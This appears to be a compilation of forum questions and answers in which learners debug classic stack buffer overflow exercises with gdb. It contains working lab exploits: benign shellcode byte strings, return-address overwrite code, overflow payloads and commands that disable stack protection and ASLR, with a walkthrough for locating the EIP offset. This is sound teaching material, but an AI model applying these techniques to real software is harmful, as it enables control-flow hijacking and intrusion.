I was reading Hacking: The Art of Exploitation by Jon Erickson, and followed the example in the book in my Kali Linux system (64 bit).
I wrote a simple C program:
#include<stdio.h>
int main()
{
int i;
for(i=0;i<10;i++)
{
printf("Hello");
}
}
After using objdump and gdb to examine the executable, I found something strange.
As the picture shows, the main function was in the "0x000000000000063a".
But the breakpoint info after the gdb "run" command, it seems that the program stopped at 63e rather than 63a.
Another peculiar thing is that the value in the instruction pointer (rip) was 0x55555555463e.
Shouldn't it be 0x000000000000063a?
Where do those 5s come from?
GDB sets breakpoints on useful code for a function if you don't set an asterisk. It omits all preparation for a function(prologue). To make it clear try to debug the following code:
#include <stdio.h>
int main()
{
int i=10;
i++;
return 0;
}
Gdb session:
(gdb) b main
Breakpoint 1 at 0x80483e1
(gdb) b *main
Breakpoint 2 at 0x80483db
(gdb) r
Starting program: /home/src/main
Breakpoint 2, 0x080483db in main ()
(gdb) disas
Dump of assembler code for function main:
=> 0x080483db <+0>: push ebp
0x080483dc <+1>: mov ebp,esp
0x080483de <+3>: sub esp,0x10
0x080483e1 <+6>: mov DWORD PTR [ebp-0x4],0xa
0x080483e8 <+13>: add DWORD PTR [ebp-0x4],0x1
0x080483ec <+17>: mov eax,0x0
0x080483f1 <+22>: leave
0x080483f2 <+23>: ret
End of assembler dump.
(gdb) c
Continuing.
Breakpoint 1, 0x080483e1 in main ()
(gdb) disas
Dump of assembler code for function main:
0x080483db <+0>: push ebp
0x080483dc <+1>: mov ebp,esp
0x080483de <+3>: sub esp,0x10
=> 0x080483e1 <+6>: mov DWORD PTR [ebp-0x4],0xa
0x080483e8 <+13>: add DWORD PTR [ebp-0x4],0x1
0x080483ec <+17>: mov eax,0x0
0x080483f1 <+22>: leave
0x080483f2 <+23>: ret
End of assembler dump.
in this case, preparation to execute useful code of the function is :
0x080483db <+0>: push ebp
0x080483dc <+1>: mov ebp,esp
0x080483de <+3>: sub esp,0x10
first instruction in main:
int i=10;
compiled into:
mov DWORD PTR [ebp-0x4],0xa
GDB set a breakpoint on the instruction, when we give the command b main
But if we use the command with an asterisk(pointer) b *main we set a breakpoint on the actual address of the function(on first instruction of prologue).
In OP case, if we set breakpoint by break *main and then run, the instruction pointer register(rip) will have the value 0x55555555463a
Related
I would like to understand how the stack works.
I am using gdb to disassemble my code.
I disassemble the following code :
int main(){
char*buf;
buf="TEST";
return 0;
}
After compiling, I run gdb and disassemble the code.
I got this result:
0x080483db <+0>: push %ebp
0x080483dc <+1>: mov %esp,%ebp
0x080483de <+3>: sub $0x10,%esp
0x080483e1 <+6>: movl $0x8048470,-0x4(%ebp)
0x080483e8 <+13>: mov $0x0,%eax
0x080483ed <+18>: leave
0x080483ee <+19>: ret
I set a breakpoint at the instruction 0x080483e8, then I run.
When I print the value at the adress 0x8048470, I got TEST\n but I don't get same result when I execute the command x\s $ebp-0x4.
As the content of 0x8048470 has been moved to -0x4(%ebp), shouldn't I get the same value at both adresses?
Let me illustrate the problem here
This is main
(gdb) disass main
Dump of assembler code for function main:
0x000000000040057c <+0>: push rbp
0x000000000040057d <+1>: mov rbp,rsp
0x0000000000400580 <+4>: sub rsp,0x40
0x0000000000400584 <+8>: mov DWORD PTR [rbp-0x34],edi
0x0000000000400587 <+11>: mov QWORD PTR [rbp-0x40],rsi
0x000000000040058b <+15>: mov rax,QWORD PTR [rbp-0x40]
0x000000000040058f <+19>: add rax,0x8
0x0000000000400593 <+23>: mov rdx,QWORD PTR [rax]
0x0000000000400596 <+26>: lea rax,[rbp-0x30]
0x000000000040059a <+30>: mov rsi,rdx
0x000000000040059d <+33>: mov rdi,rax
0x00000000004005a0 <+36>: call 0x400430 <strcpy#plt>
0x00000000004005a5 <+41>: mov eax,0x0
0x00000000004005aa <+46>: call 0x400566 <function>
0x00000000004005af <+51>: mov eax,0x0
0x00000000004005b4 <+56>: leave
0x00000000004005b5 <+57>: ret
End of assembler dump.
(gdb) list
#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}
It was compiled using the following:
gcc -g -o exploitable0 vulnerable_program0.c -fno-stack-protector -z execstack
The attacker is obviously tempted to overrun the buffer specified by the array 'a'.
Let's examine more in depth what the stack looks like when i run the exploit
(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9 function();
(gdb) i r rbp
rbp 0x7fffffffdc10 0x7fffffffdc10
(gdb) i r rsp
rsp 0x7fffffffdbd0 0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8 0x00007fff 0x0040060d 0x00000002
0x7fffffffdbe0: 0x315915eb 0x3104b0c0 0x31c3ffdb 0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080 0xe880cdcb 0xffffffe6 0x6c6c6548
0x7fffffffdc00: 0x771f2c6f 0x646c726f 0x21212121 0x21212121
0x7fffffffdc10: 0x00400566 0x00000000
(gdb)
the affected buffer starts at 0x7fffffffdbe0 and ends at 0x7fffffffdc10.
The shellcode injects smoothtly , to make things simpler i overwrite the return address with that of the function.
That is, I actually used 0x400566 as the return address, so if everything runs smoothly it would just call the function and print "test". You can clearly see from the assembly dump that is the address of the function "function"
expected output: "testtest".
actual output: test ( the program calls the function already).
I think you're having troubles with the StackGuard protection from GCC that prevents buffer overflows.
Try compiling your code with the
-fno-stack-protector
flag in order to disable the protection for your program.
Assuming you're running it on Linux, if you want to disable kernel based protection, which is called Address Space Randomization, you can run :
sysctl -w kernel.randomize_va_space=0
I was trying to overwrite the return address of main() with the address of the shellcode that I wrote in assembly.
My assembly program :
ExitShell.asm
SECTION .text
global _start
_start:
jmp short shellOffset
Shellcode:
pop esi
lea ecx, [esi]
mov dl, 12
mov bl, 1
mov al, 4
int 0x80
mov bl, 20
mov al, 1
int 0x80
shellOffset:
call Shellcode
msg db "Hello World",0xa
My .c file in which I am overwriting the return address :
ShellCode.c
#include<stdio.h>
char shellcode[] = "\xeb\x11\x5e\x8d\x0e\xb2\x0c\xb3\x01\xb0\x04\xcd\x80"\
"\xb3\x14\xb0\x01\xcd\x80\xe8\xea\xff\xff\xff"\
"\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x0a";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
I compiled the program with the following command :
gcc -O0 -o sh ShellCode.c -fno-stack-protector -zexec -fno-asynchronous-unwind-tables -g
When I executed the program, I received the segmentation fault error. Loading the program into gdb, I found that it was giving the error at ret statement in assembly
Dump of assembler code for function main:
0x080483b4 <+0>: push %ebp
0x080483b5 <+1>: mov %esp,%ebp
0x080483b7 <+3>: sub $0x10,%esp
0x080483ba <+6>: lea -0x4(%ebp),%eax
0x080483bd <+9>: add $0x8,%eax
0x080483c0 <+12>: mov %eax,-0x4(%ebp)
0x080483c3 <+15>: mov -0x4(%ebp),%eax
0x080483c6 <+18>: mov $0x804a040,%edx
0x080483cb <+23>: mov %edx,(%eax)
0x080483cd <+25>: leave
=> 0x080483ce <+26>: ret
What is the issue? I am new to this.
This can have many reasons. You disabled the stack smashing detector, but that doesn't mean, that ret in main is going to be allocated right after the return address. The compiler and linker have some leeway in aligning the variables' addresses to improve performance or to satisfy CPU alignment requirements.
Another issue is, that shellcode will be placed in the .data segment, which may be set nonexecutable, so main returning to shellcode would trigger that trap.
I have been following this tutorial at http://insecure.org/stf/smashstack.html but at example3.c my function return address doesn't correspond to the logic he implies. I can understand how the return address can be changed at a function but doing it on my computer just doesn't do the trick. I have used -fno-stack-protector and gdb with info registers and disassemble main and also disassemble the function but to no avail. I'm kinda new to Assembly.
My computer is running xubuntu 14 32bits.
My gcc instruction is: gcc -Wall -ansi -g -fno-stack-protector example3.c
example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
------------------------------------------------------------------------------
gdb disassemble on main with a breakpoint on function call
(gdb) disassemble main
Dump of assembler code for function main:
0x0804843b <+0>: push %ebp
0x0804843c <+1>: mov %esp,%ebp
0x0804843e <+3>: and $0xfffffff0,%esp
0x08048441 <+6>: sub $0x20,%esp
0x08048444 <+9>: movl $0x0,0x1c(%esp)
=> 0x0804844c <+17>: movl $0x3,0x8(%esp)
0x08048454 <+25>: movl $0x2,0x4(%esp)
0x0804845c <+33>: movl $0x1,(%esp)
0x08048463 <+40>: call 0x804841d <function>
0x08048468 <+45>: movl $0x1,0x1c(%esp)
0x08048470 <+53>: mov 0x1c(%esp),%eax
0x08048474 <+57>: mov %eax,0x4(%esp)
0x08048478 <+61>: movl $0x8048520,(%esp)
0x0804847f <+68>: call 0x80482f0 <printf#plt>
0x08048484 <+73>: leave
0x08048485 <+74>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x0804841d <+0>: push %ebp
0x0804841e <+1>: mov %esp,%ebp
0x08048420 <+3>: sub $0x20,%esp
=> 0x08048423 <+6>: lea -0x9(%ebp),%eax
0x08048426 <+9>: add $0xc,%eax
0x08048429 <+12>: mov %eax,-0x4(%ebp)
0x0804842c <+15>: mov -0x4(%ebp),%eax
0x0804842f <+18>: mov (%eax),%eax
0x08048431 <+20>: lea 0x8(%eax),%edx
0x08048434 <+23>: mov -0x4(%ebp),%eax
0x08048437 <+26>: mov %edx,(%eax)
0x08048439 <+28>: leave
0x0804843a <+29>: ret
End of assembler dump.
At line 9 of function, *ret points to a completely different address
9 (*ret) += 8;
(gdb) p/x *ret
$1 = 0x48468c7 (already with the + 8)
So to clarify, this program is supose to print 0 since the return was changed to jump over the x = 1 instruction.
My question is, why isn't *ret pointing to an address that is somewhat close to main's corresponding addresses?
I'm sorry for my English.
Best regards,
Vcoder
Your tutorial is about some very old compiler.
Lets handle experiment (say gcc 4.8.1, 64-bit Win32) with identical results:
Step 1. Identify where function really starts:
(gdb) disassemble function
Dump of assembler code for function function:
=> 0x00000000004014f0 <+0>: push %rbp
Step 2. Store somewhere its address and break here
(gdb) b *0x00000000004014f0
Breakpoint 1 at 0x4014f0: file test3.c, line 1.
(gdb) r
Breakpoint 1, function (a=1, b=4200201, c=4) at test3.c:1
1 void function(int a, int b, int c) {
Step 3. Okay, here we are. Lets explore where do our return address stored:
(gdb) p $rsp
$1 = (void *) 0x22fe18
(gdb) x 0x22fe18
0x22fe18: 0x0040154c
Wow. Lets check inside main:
0x0000000000401547 <+36>: callq 0x4014f0 <function>
0x000000000040154c <+41>: movl $0x1,-0x4(%rbp)
Step 4. Looks like we found it. Store somewhere value of $rsp=0x22fe18 and now lets see what is buffer starts:
7 (*ret) += 8;
(gdb) p &buffer1[0]
$2 = 0x22fe00 "`\035L"
So buffer[0] address is 0x22fe18 - 0x22fe00 = 0x18 from our target. Not 0xc, as in your example, uh-oh.
P.S. On your compiler and OS, and your optimization options it might be not 0x18, but other value. Try. Experiment. Being hacker is about experimenting, not about running someones scripts.
Good luck.
I was taking at this example w.r.t. shellcoder's handbook(second edition), and have some question about the stack
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 void ret_input(void){
2 char array[30];
3
4 gets(array);
5 printf("%s\n", array);
6 }
7 main(){
8 ret_input();
9
10 return 0;
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push ebp
0x08048415 <+1>: mov ebp,esp
0x08048417 <+3>: sub esp,0x24
0x0804841a <+6>: lea eax,[ebp-0x1e]
0x0804841d <+9>: mov DWORD PTR [esp],eax
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea eax,[ebp-0x1e]
0x08048428 <+20>: mov DWORD PTR [esp],eax
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb) break *0x08048420
Breakpoint 1 at 0x8048420: file sc.c, line 4.
(gdb) break *0x08048431
Breakpoint 2 at 0x8048431: file sc.c, line 6.
(gdb) run
Starting program: /root/pentest/sc
Breakpoint 1, 0x08048420 in ret_input () at sc.c:4
4 gets(array);
(gdb) x/20x $esp
0xbffff51c: 0xbffff522 0xb7fca324 0xb7fc9ff4 0x08048460
0xbffff52c: 0xbffff548 0xb7ea34a5 0xb7ff1030 0x0804846b
0xbffff53c: 0xb7fc9ff4 0xbffff548 0x0804843a 0xbffff5c8
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
Breakpoint 2, 0x08048431 in ret_input () at sc.c:6
6 }
(gdb) x/20x 0x0bffff51c
0xbffff51c: 0xbffff522 0x4141a324 0x41414141 0x41414141
0xbffff52c: 0x42424242 0x42424242 0x43434242 0x43434343
0xbffff53c: 0x43434343 0x44444444 0x44444444 0xbffff500
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) ^Z
[1]+ Stopped gdb -q sc
root#bt:~/pentest# printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�
root#bt:~/pentest#
in this example i was taking 48 bytes "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" that to rewrite ret address, and all is work. But when i tried to use example from first edition of this book, i faced with some problem
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
0x08048417 <+3>: sub $0x24,%esp
0x0804841a <+6>: lea -0x1e(%ebp),%eax
0x0804841d <+9>: mov %eax,(%esp)
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea -0x1e(%ebp),%eax
0x08048428 <+20>: mov %eax,(%esp)
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb)
why program has taken 24(hex)=36(dec)bytes for array, but i used 48 that rewrite, 36 bytes of array, 8 bytes of esp and ebp(how i know), but there are steel have 4 unexplained bytes
ok, lets try out the sploit from first edition of book who rewrite all of array by address of call function, in book they had "sub &0x20,%esp" so code is
main(){
int i=0;
char stuffing[44];
for (i=0;i<=40;i+=4)
*(long *) &stuffing[i] = 0x080484bb;
puts(array);
i have ""sub &0x24,%esp" so my code will be
main(){
int i=0;
char stuffing[48];
for (i=0;i<=44;i+=4)
*(long *) &stuffing[i] = 0x08048435;
puts(array);
result of the shellcoders' handbook
[root#localhost /]# (./adress_to_char;cat) | ./overflow
input
""""""""""""""""""a<u___.input
input
input
and my result
root#bt:~/pentest# (./ad_to_ch;cat) | ./sc
5�h���ل$���������h����4��0��˄
inout
Segmentation fault
root#bt:~/pentest#
What's problem?
i was compiling with
-fno-stack-protector -mpreferred-stack-boundary=2
I suggest you better get the amount of bytes necessary to overflow the buffer by trying in GDB. I compiled the source you provided in your question and ran it through GDB:
gdb$ r < <(python -c "print('A'*30)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 29912) exited normally]
(Do note that I use Python to create my input instead of a compiled C program. It really does not matter, use what you prefer.)
So 30 bytes are fine. Let's try some more:
gdb$ r < <(python -c "print('A'*50)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ i r $eip
eip 0x41414141 0x41414141
Our eip register now contains 0x41414141, which is AAAA in ASCII. Now, we can gradually check where exactly we have to place the value in our buffer that updates eip:
gdb$ r < <(python -c "print('A'*40+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x8004242
0x08004242 in ?? ()
B is 0x42. Thus, we overwrote half of eip when using 40 A's and four B's. Therefore, we pad with 42 A's and then put the value we want to update eip with:
gdb$ r < <(python -c "print('A'*42+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
We got full control over eip! Let's try it. Set a breakpoint at the end of ret_input (your addresses may vary as I recompiled the binary):
gdb$ dis ret_input
Dump of assembler code for function ret_input:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x38,%esp
0x0804840a <+6>: lea -0x26(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x26(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
End of assembler dump.
gdb$ break *0x8048421
Breakpoint 1 at 0x8048421
As an example, let's modify eip so once returning from ret_input we end up at the beginning of the function again:
gdb$ r < <(python -c "print('A'*42+'\x04\x84\x04\x08')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
--------------------------------------------------------------------------[code]
=> 0x8048421 <ret_input+29>: ret
0x8048422 <main>: push ebp
0x8048423 <main+1>: mov ebp,esp
0x8048425 <main+3>: and esp,0xfffffff0
0x8048428 <main+6>: call 0x8048404 <ret_input>
0x804842d <main+11>: mov eax,0x0
0x8048432 <main+16>: leave
0x8048433 <main+17>: ret
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048421 in ret_input ()
We pad 42 A's and then append the address of ret_input to our buffer. Our breakpoint on the ret triggers.
gdb$ x/w $esp
0xffffd30c: 0x08048404
On top of the stack there's the last DWORD of our buffer - ret_input's address.
gdb$ n
0x08048404 in ret_input ()
gdb$ i r $eip
eip 0x8048404 0x8048404 <ret_input>
Executing the next instruction pops that value off the stack and sets eip accordingly.
On a side note: I recommend the .gdbinit file from this guy.
This row :
for (i=o;i<=44;i+=4);
Remove the ; from the end. I also assume that the o(letter o) instead of 0(zero) is mistyped here.
The problem is that your for loop is executing ; (a.k.a. do nothing) until i becomes larger then 44, and then you execute the next command with i = 44 wich is outside the bounds of array and you get Segmentation Error. You should watch out for this type of error as it is hardly visible and it is completely valid c code.